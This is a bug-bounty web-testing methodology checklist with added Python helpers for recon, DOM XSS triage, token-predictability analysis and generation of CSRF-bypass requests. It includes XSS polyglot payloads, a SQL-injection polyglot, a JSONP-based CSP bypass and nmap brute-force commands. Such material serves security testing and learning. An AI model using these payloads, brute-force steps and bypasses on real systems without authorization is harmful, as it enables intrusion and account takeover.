A Small Set of Customized Tools for Merry Making
TODO:
- Install: gopass (password manager) for bug bounty credentials
- Cannibalise: domain enum & info gathering tools, Reddit comments, HN comments, the Big List of Naughty Strings, SecLists, security-idiots payloads, PayloadsAllTheThings, polyglot payloads
- Hackbar - Firefox add-on -- looks useful
Steps:
- Discovery / Mapping:
- Linked Resources:
- Find in-scope domains with enum-domains
- Try to find the origin IP behind Cloudflare:
- Use the enum-domains CSV list for non-Cloudflare IPs; historical hosting lookup: http://toolbar.netcraft.com/site_report?url=example.com
- dig (many resolvers refuse ANY these days, so query A, MX and TXT explicitly if this comes back empty):
dig ANY example.com
- Get them to send an email (sign up, password reset) & check the Received: headers for the IP of the host that handed the mail to the relay
- https://rhinosecuritylabs.com/cloud-security/cloudflare-bypassing-cloud-security/
- Reverse IP lookup: https://github.com/darkoperator/dnsrecon
- haven't tried ^ yet
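Added example for the "check email headers" step above (not a tool from these notes): it walks the Received: chain of a message the target sent, drops private addresses and anything inside Cloudflare's ranges, and returns the remaining IPs closest-to-sender first. The sample message is constructed, example.com / tester.test are placeholders, and the Cloudflare range list is a snapshot that should be refreshed from https://www.cloudflare.com/ips/ before you trust it.

```python
"""Pull candidate origin IPs out of the Received: chain of an email the target
sent (signup confirmation, password reset).  Added example, not the original
author's tooling; the message below is constructed and the CDN range list is a
snapshot to refresh from https://www.cloudflare.com/ips/."""
import ipaddress
import re
from email import message_from_string

# Snapshot of Cloudflare's published IPv4 ranges (assumption: current when
# written; refresh before relying on it).
CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]
# Addresses that can never be an internet-facing origin.  The RFC 5737
# documentation ranges are deliberately NOT excluded so the sample below works.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
)]
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def is_candidate(ip_text):
    """True for a public address that is not fronted by the CDN."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return not any(ip in net for net in NON_ROUTABLE + CLOUDFLARE_V4)


def candidate_origins(raw_message):
    """Return candidate origin IPv4s from the Received: headers, closest to the
    sender first.  Each MTA prepends its own Received: line, so the LAST header
    is the first hop: typically the app server handing mail to the relay."""
    msg = message_from_string(raw_message)
    seen = []
    for header in reversed(msg.get_all("Received") or []):
        for ip_text in IPV4_RE.findall(header):
            if is_candidate(ip_text) and ip_text not in seen:
                seen.append(ip_text)
    return seen


# Constructed message: hops 3 and 2 were stamped by the target's own systems,
# hop 1 by our receiving MX.  203.0.113.45 stands in for the app server.
SAMPLE_MESSAGE = """\
Received: from mail.example.com (mail.example.com [198.51.100.10])
\tby inbox.tester.test (Postfix) with ESMTPS id 4F2A1; Tue, 1 Jan 2019 10:00:02 +0000
Received: from web-01.example.com (web-01.example.com [203.0.113.45])
\tby mail.example.com (Postfix) with ESMTP id 9C1B7; Tue, 1 Jan 2019 10:00:01 +0000
Received: from localhost (localhost [127.0.0.1])
\tby web-01.example.com (Postfix) with ESMTP id 7D0E3; Tue, 1 Jan 2019 10:00:00 +0000
From: noreply@example.com
To: tester@tester.test
Subject: Confirm your account

Welcome aboard.
"""

if __name__ == "__main__":
    # Candidates come out origin-first; verify each by connecting to it with
    # the target's Host header before calling it the origin.
    print(candidate_origins(SAMPLE_MESSAGE))
```

Feed it the raw source of the mail (most webmail clients have a "show original" option); anything it returns is only a candidate until a direct request to that IP with the right Host header serves the target's content.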
- Recon in social networks:
- Figure out the tech stack and the like from job postings, employees' listed experience, etc.
- Reddit / github / monster / LinkedIn / indeed / etc
- More sources for subdomains and historical IPs:
- via: VirusTotal => https://virustotal.com/en/domain/<domain>/information/ (observed subdomains and past DNS resolutions)
- via: SimilarWeb
- Use a certificate transparency lookup (e.g. crt.sh) for hostnames named in issued certs:
- Scan subdomains for popular services / plugins:
- curl each subdomain, then grep the response (headers and body) for service strings
- eg: facebook, wordpress, surveygizmo, aws, shopify, unbounce, fastly, heroku, github, desk, tumblr
- Save the responses and results with a timestamp so you can go back historically when a vuln in one of those services turns up
- TODO: write that tool
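Added example for the "write that tool" item above (not the original author's code): a fingerprint function for one saved HTTP response plus a JSON-lines history so a later re-scan can be diffed. SIGNATURES is my own starting set of markers, not an authoritative list, and the two sample responses are constructed.

```python
"""Fingerprint the services and platforms behind a host from one saved HTTP
response, and keep a history so a later re-scan can be diffed.  Added example
for the "scan subdomains for popular services" step; not the original author's
code.  SIGNATURES is a starting set, not an authoritative list; the sample
responses are constructed."""
import hashlib
import json
import re
from datetime import datetime, timezone

# (service, regex).  Patterns anchored with ^ are meant for "name: value"
# header lines; the rest match anywhere in headers or body.
SIGNATURES = [
    ("cloudflare", r"^server: cloudflare|^cf-ray:"),
    ("fastly", r"^x-served-by: cache-|^via: .*varnish"),
    ("heroku", r"^via: 1\.1 vegur"),
    ("github-pages", r"^server: github\.com"),
    ("aws", r"^x-amz-|amazonaws\.com|cloudfront\.net"),
    ("shopify", r"^x-shopify-|cdn\.shopify\.com"),
    ("wordpress", r"/wp-content/|/wp-includes/|content=\"wordpress"),
    ("facebook", r"connect\.facebook\.net"),
    ("unbounce", r"unbounce(pages)?\.com"),
    ("surveygizmo", r"surveygizmo\.com"),
    ("tumblr", r"\.tumblr\.com"),
    ("desk", r"\.desk\.com"),
]
COMPILED = [(name, re.compile(p, re.IGNORECASE | re.MULTILINE)) for name, p in SIGNATURES]


def fingerprint(headers, body):
    """Sorted list of services whose markers appear in the response.  Headers
    are folded to lower-case 'name: value' lines and scanned together with the
    body, so a body line beginning 'server:' could false-positive; eyeball it."""
    header_text = "\n".join(f"{k.lower()}: {v}" for k, v in headers.items())
    haystack = header_text + "\n" + body
    return sorted(name for name, rx in COMPILED if rx.search(haystack))


def snapshot(host, headers, body):
    """One history record: what ran on the host, and a hash to spot content changes."""
    return {
        "host": host,
        "scanned_at": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "body_sha256": hashlib.sha256(body.encode("utf-8")).hexdigest(),
        "services": fingerprint(headers, body),
    }


def append_history(path, record):
    """Append a record as one JSON line; grep the file by host when a vuln in
    a service turns up later and you want to know who was running it when."""
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(json.dumps(record, sort_keys=True) + "\n")


def diff_services(old, new):
    """Services that appeared or disappeared between two records of one host."""
    before, after = set(old["services"]), set(new["services"])
    return {"added": sorted(after - before), "removed": sorted(before - after)}


# Constructed responses as (headers, body); in practice feed it the output of
# `curl -si https://<subdomain>` split at the first blank line.
SAMPLE_RESPONSES = {
    "shop.example.com": (
        {"Server": "cloudflare", "CF-RAY": "0123456789abcdef-LHR",
         "X-Shopify-Stage": "production"},
        '<html><script src="https://cdn.shopify.com/s/app.js"></script>'
        '<script src="https://connect.facebook.net/en_US/sdk.js"></script></html>',
    ),
    "blog.example.com": (
        {"Via": "1.1 vegur", "Content-Type": "text/html"},
        '<link rel="stylesheet" href="/wp-content/themes/x/style.css">',
    ),
}

if __name__ == "__main__":
    for host, (headers, body) in SAMPLE_RESPONSES.items():
        record = snapshot(host, headers, body)
        print(json.dumps(record))
        # append_history("recon-history.jsonl", record)
```

Each marker is a hint, not proof: a page that merely links to cdn.shopify.com is not a Shopify store, so confirm the platform by hand before filing anything against it.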
- nmap scans:
- Port scan (SYN scan of all 65535 TCP ports with version/OS detection and page titles; -sS needs root, and -p- is slow, so let it run in the background while you work from the quick scan):
nmap -sS -A -Pn -p- --script=http-title example.com
- Alternatives:
nmap -T4 -A -v -Pn example.com
nmap-domains/scan.rb
- To scan a list of hosts:
nmap -iL list-of-ips.txt
- Attack individual targets as available
- Unlinked Resources:
- DirBuster to brute force; use SecLists to augment the wordlists:
- RAFT lists
- Git digger
- svn digger
- Try spidering deeper: a 401 on a directory means something protected is there, so brute force underneath it:
acme.com - 200
acme.com/backlog/ - 404
acme.com/controlpanel/ - 401 <-- dig deeper
acme.com/controlpanel/[bruteforce here now]
- Tech stack -- check for CVEs against results here:
- Wappalyzer (chrome)
- Builtwith (chrome)
- retire.js
- Custom engines
- OSINT:
- Use past flaws to pivot into new flaws
- xssed.com
- reddit xss
- punkspider
- xss.cx
- xssposed.org
- twitter search
- SWFs search:
- Google dorks:
site:url.com ext:swf
- Login w/ Facebook Connect:
- look for redirect_uri & open redirects on the site: the aim is to get the OAuth code / access token delivered to a URL you control
- Links to learn, I don't understand open redirect:
- http://homakov.blogspot.se/2013/02/hacking-facebook-with-oauth2-and-chrome.html
- http://www.breaksec.com/?p=6039 Facebook Connect
- 3rd Party Scripts:
- look for URL downloads in scripts (which hosts the page pulls code from)
- are there URL query parameters used in scripts? grep for:
(get)?(query|url|qs|hash)param
location\.(hash|href|search)\.match
- bypass Content Security Policy:
- Look at the domains the CSP allows for script-src and use those as the attack vector: a JSONP endpoint on an allowed host reflects the callback name into a script response, eg:
<script src="mixpanel.com?callback=alert(1)">
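Added example for the two items above (not the original author's code): it runs the greps from the notes, plus a wider set of DOM XSS sources and sinks that I chose, over a JavaScript file, and parses a Content-Security-Policy header to list the allowed script hosts and the weak tokens ('unsafe-inline', scheme-only sources and so on). The widget script and the policy header are constructed; the .test hostnames are placeholders.

```python
"""Triage JavaScript for DOM XSS leads and review the CSP a payload would have
to live under.  Added example, not the original author's code.  The first two
SOURCE_PATTERNS are the greps from the notes; the rest of the pattern lists
are my starting set.  The script and CSP below are constructed."""
import re

# Sources: where attacker-controlled data enters the page.
SOURCE_PATTERNS = [
    r"(get)?(query|url|qs|hash)param",
    r"location\.(hash|href|search)\.match",
    r"location\.(hash|href|search)\b",
    r"document\.(URL|documentURI|referrer|baseURI)\b",
    r"window\.name\b",
    r"addEventListener\(\s*['\"]message['\"]",
]
# Sinks: where a string becomes markup, code or a navigation target.
SINK_PATTERNS = [
    r"\.(inner|outer)HTML\s*=(?!=)",
    r"\.insertAdjacentHTML\(",
    r"document\.write(ln)?\(",
    r"\beval\(",
    r"new\s+Function\(",
    r"set(Timeout|Interval)\(\s*['\"]",
    r"\$\([^)]*\)\.(html|append|prepend|after|before)\(",
    r"location(\.href)?\s*=(?!=)",
]
CSP_WEAK_TOKENS = {"'unsafe-inline'", "'unsafe-eval'", "*", "data:", "blob:", "http:", "https:"}


def grep_js(source, patterns):
    """Return (line_no, pattern, stripped_line) for every match; a line that
    hits several patterns is reported once per pattern."""
    compiled = [(p, re.compile(p, re.IGNORECASE)) for p in patterns]
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        hits.extend((no, raw, line.strip()) for raw, rx in compiled if rx.search(line))
    return hits


def triage_js(source):
    """Sources and sinks side by side; a file with both is where manual review
    starts (trace each source line forward to a sink line)."""
    return {"sources": grep_js(source, SOURCE_PATTERNS),
            "sinks": grep_js(source, SINK_PATTERNS)}


def parse_csp(header):
    """Parse a Content-Security-Policy header into {directive: [sources]}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.strip().split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def csp_review(header):
    """Effective script sources, the weak tokens among them, and the allowed
    hosts.  Every allowed host is a candidate for the 'use a whitelisted
    domain' attack in the notes: a JSONP endpoint or user-uploaded file on it
    runs with the page's origin.  script-src falls back to default-src."""
    policy = parse_csp(header)
    script_src = policy.get("script-src", policy.get("default-src", []))
    weak = sorted(t for t in script_src if t.lower() in CSP_WEAK_TOKENS)
    hosts = sorted(t for t in script_src
                   if not t.startswith("'") and t.lower() not in CSP_WEAK_TOKENS)
    return {"script_src": script_src, "weak": weak, "hosts": hosts}


# Constructed third-party widget and policy header.
SAMPLE_JS = """\
// widget.js (constructed)
var ref = getQueryParam('ref');
var m = location.hash.match(/#name=(.*)/);
document.getElementById('greet').innerHTML = 'Hi ' + decodeURIComponent(m[1]);
window.addEventListener('message', function (e) { eval(e.data); });
"""
SAMPLE_CSP = ("default-src 'self'; script-src 'self' 'unsafe-inline' "
              "https://cdn.example-analytics.test https://*.example-cdn.test; img-src *")

if __name__ == "__main__":
    result = triage_js(SAMPLE_JS)
    for kind in ("sources", "sinks"):
        for no, pattern, line in result[kind]:
            print(f"{kind[:-1]:6} L{no} [{pattern}] {line}")
    print(csp_review(SAMPLE_CSP))
```

The regexes are deliberately loose (line 3 of the sample hits two source patterns), which suits a first pass over minified third-party code; confirm any lead in the browser's debugger before spending time on a payload.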
- Initial Assessment
- Visit the search, registration, contact, password reset, and comment forms and hit them with your polyglot strings
- Scan those specific functions with Burp’s built-in scanner
- Check your cookie, log out, check cookie, log in, check cookie. Submit old cookie, see if access.
- Perform user enumeration checks on login, registration, and password reset.
- Do a reset and see if: the password comes back in plaintext, the flow uses a URL-based token, the token is predictable, can be used multiple times, or logs you in automatically
- Find numeric account identifiers anywhere in URLs and rotate them for a context change
- Find the security-sensitive function(s) or files and see if they are vulnerable to non-auth browsing (IDORs), lower-auth browsing, CSRF, CSRF protection bypass, and whether they can be done over plain HTTP
- Directory brute force with the short "top" list from SecLists
- Check upload functions for alternate file types that can execute code (xss or php/etc/etc)
- FTP brute force (the wildcard also runs ftp-anon and the other ftp-* scripts):
nmap --script=ftp* -p 21 target.com
- SSH brute force (ssh* also runs ssh-hostkey and ssh2-enum-algos):
nmap --script=ssh* -p 22 target.com
- Enum users over SMTP:
nmap --script=smtp-enum-users -p 25 target.com
- http://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
- Erlang port mapper (epmd) info:
nmap -p 4369 --script epmd-info <target>
- Try to chain attacks in auth:
- reset password + brute force tokens
- Timing attack: try to register / reset password / log in with a known-valid and a known-invalid account
- Time how long it takes for known success vs known failure; a consistent gap leaks whether the account exists
- Ref: http://cwe.mitre.org/data/definitions/208
- Worth brute forcing / checking for predictability:
- TFA backup codes
- TFA codes
- Password reset tokens
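Added example for the auth-chaining items above (not the original author's tooling): given a batch of captured reset tokens it measures how much of the nominal token space the sample actually uses and whether the tokens step like a counter or timestamp; it converts a space size into brute-force hours at a given request rate; and it compares response-time samples for a valid and an invalid account so a timing leak is only reported when the gap beats the jitter. All tokens and timings below are constructed, and the thresholds (20 ms, twice the standard deviation, a step under 10^6) are my choices.

```python
"""Assess a reset / login / 2FA flow for the chained attacks listed above:
are the tokens predictable, is the space small enough to brute force, and does
response time leak account existence?  Added example, not the original
author's tooling; all tokens and timings below are constructed."""
import math
import random
import statistics
from collections import Counter


def per_position_entropy(tokens):
    """Shannon entropy (bits) of each character position across the sample.
    Positions near 0 bits are constant or slow-moving (timestamps, counters)."""
    length = len(tokens[0])
    if any(len(t) != length for t in tokens):
        raise ValueError("mixed token lengths; group by length first")
    n = len(tokens)
    bits = []
    for i in range(length):
        counts = Counter(t[i] for t in tokens)
        bits.append(-sum(c / n * math.log2(c / n) for c in counts.values()))
    return bits


def effective_bits(tokens):
    """Entropy the sample actually exhibits, summed over positions.  A small
    sample caps each position at log2(len(tokens)), so this understates a good
    token; the gap against nominal_bits() is what to look at."""
    return sum(per_position_entropy(tokens))


def nominal_bits(tokens):
    """Size of the space implied by the observed alphabet and length."""
    alphabet = set("".join(tokens))
    return len(tokens[0]) * math.log2(len(alphabet))


def looks_sequential(tokens):
    """True when tokens, in capture order, decode as integers with small
    positive steps (counter- or timestamp-derived).  Decimal digits parse as
    hex too, so one decoder covers both encodings."""
    try:
        values = [int(t, 16) for t in tokens]
    except ValueError:
        return False
    steps = [b - a for a, b in zip(values, values[1:])]
    return bool(steps) and all(0 < s < 10 ** 6 for s in steps)


def brute_force_hours(bits, requests_per_second):
    """Wall-clock hours to exhaust a space of 2**bits at a sustained rate;
    a 6-digit 2FA code is about 19.9 bits."""
    return 2 ** bits / requests_per_second / 3600


def timing_leak(valid_ms, invalid_ms, min_gap_ms=20.0):
    """Compare response times for a known-valid and a known-invalid account.
    Flags a leak only when the median gap exceeds min_gap_ms AND twice the
    larger sample's standard deviation, so jitter alone does not trigger it.
    Collect dozens of interleaved samples per class in practice."""
    gap = abs(statistics.median(valid_ms) - statistics.median(invalid_ms))
    spread = max(statistics.pstdev(valid_ms), statistics.pstdev(invalid_ms))
    return {"gap_ms": round(gap, 1), "spread_ms": round(spread, 1),
            "leak": gap > min_gap_ms and gap > 2 * spread}


# Constructed samples.  WEAK_TOKENS mimic a timestamp-plus-counter token;
# STRONG_TOKENS are 128-bit hex values from a seeded RNG (seeded only so the
# example is reproducible; real tokens come from the target's reset emails).
WEAK_TOKENS = ["1546300800" + str(1000 + n) for n in range(12)]
_rng = random.Random(2019)
STRONG_TOKENS = ["".join(_rng.choice("0123456789abcdef") for _ in range(32)) for _ in range(12)]
VALID_MS = [212, 218, 210, 225, 214, 219, 211, 216]
INVALID_MS = [150, 156, 149, 158, 152, 155, 151, 153]

if __name__ == "__main__":
    for name, toks in (("weak", WEAK_TOKENS), ("strong", STRONG_TOKENS)):
        print(f"{name}: {effective_bits(toks):.1f} of {nominal_bits(toks):.1f} bits seen,"
              f" sequential={looks_sequential(toks)}")
    print("6-digit code at 50 req/s:", round(brute_force_hours(math.log2(10 ** 6), 50), 1), "hours")
    print("timing:", timing_leak(VALID_MS, INVALID_MS))
```

Request a dozen or more reset tokens in quick succession for the same account before running this; if effective_bits() comes out near zero for most positions, or looks_sequential() is true, the token is a guessable one and the rate limit on the reset endpoint becomes the only real control.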
- XSS polyglot payloads:
1. <PLAINTEXT>
2. "><img src=x onerror=confirm(1);>
3. jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
4. ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5. '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
6. " onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
7. javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
- 3rd party vectors:
- facebook login, google login, etc.
- dynamic anchor tags in url:
http://example.com#<xss-here>
- in redirects
- JS embedded in SWFs: look for parameters that can be injected
- cure53/flashbang (Cure53's Flash analysis tool)
- XSS'd username + password reset
- event / meeting names
- File upload names
- SQLi:
- polyglots:
1. SLEEP(10) /*' or SLEEP(10) or '" or SLEEP(10) or "*/
- git:danielmiessler/SecLists -> Fuzzing
- blind is most common; error-based is rarer
- sqlmap is the best tool
- Use a fuzz string first, then sqlmap on the parameters that react
- Take a Burp logfile & run sqlmap with -l <logfile>
- Burp plugin: SQLiPy, right-click to send to sqlmap
- Common injection points:
- id, currency values, item numbers, sorting/ordering params, JSON & XML values, cookie values, custom headers
- Platform specific:
- MySQL
- PentestMonkey's MySQL injection cheat sheet
- Reiners' MySQL injection filter evasion cheatsheet
- MSSQL
- EvilSQL's Error/Union/Blind MSSQL cheatsheet
- PentestMonkey's MSSQL injection cheat sheet
- Oracle
- PentestMonkey's Oracle SQLi cheatsheet
- PostgreSQL
- PentestMonkey's Postgres SQLi cheatsheet
- Others
- Access SQLi cheatsheet
- PentestMonkey's Ingres SQL injection cheat sheet
- PentestMonkey's DB2 SQL injection cheat sheet
- PentestMonkey's Informix SQL injection cheat sheet
- SQLite3 injection cheat sheet
- Ruby on Rails (Active Record) SQL injection guide
- File upload / LFI:
- Find file polyglots (one file that is valid as an image and as HTML/script)
- Manipulate metadata (EXIF etc.)
- To watch: http://goo.gl/VCXPh6
- git:danielmiessler/SecLists -> LFI
- common params:
- file=, location=, locale=, path=, display=, load=, read=, retrieve=
- Open redirect / path traversal:
- hard to get right for devs
- Common params:
- dest, continue, redirect, url, uri, window, next
- file, folder, path, style, template, php_path, doc, document, root, pg, pdf
- LFI params too
- git:danielmiessler/SecLists -> LFI
- CSRF:
- Use Burp!
- Bypasses:
- remove the CSRF token parameter from the request entirely
- keep the parameter but remove its value
- add bad control characters to the token
- send a second, identical CSRF parameter
- change POST to GET
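Added example for the bypass list above (not the original author's tooling): it takes one captured state-changing request and emits the five bypass variants as concrete requests, each rendered as a curl command so they can be replayed from a terminal or pasted into Burp Repeater. The sample request is constructed and app.example.com / attacker@example.net are placeholders.

```python
"""Generate the CSRF-protection bypass checks listed above as concrete requests
from one captured base request, and render each as a curl command.  Added
example, not the original author's tooling; the sample request is constructed
and app.example.com is a placeholder."""
import shlex
from urllib.parse import urlencode, urlsplit, urlunsplit

# A request is a dict: method, url, headers (dict), params (list of (name,
# value) pairs so a parameter can legitimately appear twice).
SAMPLE_REQUEST = {
    "method": "POST",
    "url": "https://app.example.com/account/email",
    "headers": {"Cookie": "session=abc123",
                "Content-Type": "application/x-www-form-urlencoded"},
    "params": [("email", "attacker@example.net"), ("csrf_token", "f00dbabe")],
}


def csrf_variants(request, token_param):
    """Yield (label, request) for each bypass in the notes: dropped token,
    blank token, token with control characters, duplicated token, POST->GET.
    The base request is never modified."""
    params = list(request["params"])
    tokens = [v for k, v in params if k == token_param]
    if not tokens:
        raise ValueError(f"{token_param!r} is not in the request")
    token = tokens[0]

    def with_token(value):
        return [(k, value if k == token_param else v) for k, v in params]

    def build(label, new_params, method=None):
        req = dict(request, params=new_params, method=method or request["method"])
        if req["method"] == "GET":
            # Body parameters move into the query string; the body goes away.
            scheme, host, path, _, frag = urlsplit(req["url"])
            req["url"] = urlunsplit((scheme, host, path, urlencode(new_params), frag))
            req["params"] = []
        return label, req

    yield build("remove token parameter", [(k, v) for k, v in params if k != token_param])
    yield build("blank token value", with_token(""))
    yield build("token plus control characters", with_token(token + "\x00\r\n"))
    yield build("duplicate token parameter", params + [(token_param, token)])
    yield build("POST changed to GET", params, method="GET")


def to_curl(req):
    """Render a request as a curl command line that prints only the status
    code; urlencode turns the control characters into %00%0D%0A so the shell
    never sees raw bytes."""
    parts = ["curl", "-sk", "-o", "/dev/null", "-w", "'%{http_code}\\n'",
             "-X", req["method"], shlex.quote(req["url"])]
    for name, value in req["headers"].items():
        parts += ["-H", shlex.quote(f"{name}: {value}")]
    if req["params"]:
        parts += ["--data", shlex.quote(urlencode(req["params"]))]
    return " ".join(parts)


if __name__ == "__main__":
    # Run the baseline first.  A variant that gets the same status code AND
    # the same side effect (check the account afterwards) is a bypass.
    print("# baseline")
    print(to_curl(SAMPLE_REQUEST))
    for label, req in csrf_variants(SAMPLE_REQUEST, "csrf_token"):
        print(f"# {label}")
        print(to_curl(req))
```

Status codes alone can mislead: some apps return 200 with an error page for a rejected token, so verify the side effect (did the email actually change?) for any variant that does not obviously fail.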
- Burp log tooling:
- Burpy tool (Debasish Mandal): run it against a Burp log file
- Autorize Burp plugin: git:quitten/autorize
- Insecure Direct Object Reference:
- UIDs: ++, --, negative values
- Check files with/without auth
- HTTPS everywhere